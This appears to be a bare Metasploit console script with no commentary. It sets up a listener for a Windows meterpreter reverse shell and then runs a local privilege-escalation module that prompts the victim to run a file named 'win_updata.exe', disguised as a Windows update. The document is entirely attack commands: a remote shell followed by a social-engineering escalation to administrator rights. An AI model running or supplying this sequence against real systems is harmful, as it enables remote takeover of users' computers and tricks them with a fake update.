use exploit/multi/handler
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST 192.168.52.131
set LPORT 4444
run
background
use exploit/windows/local/ask
set session 1
set filename win_updata.exe
run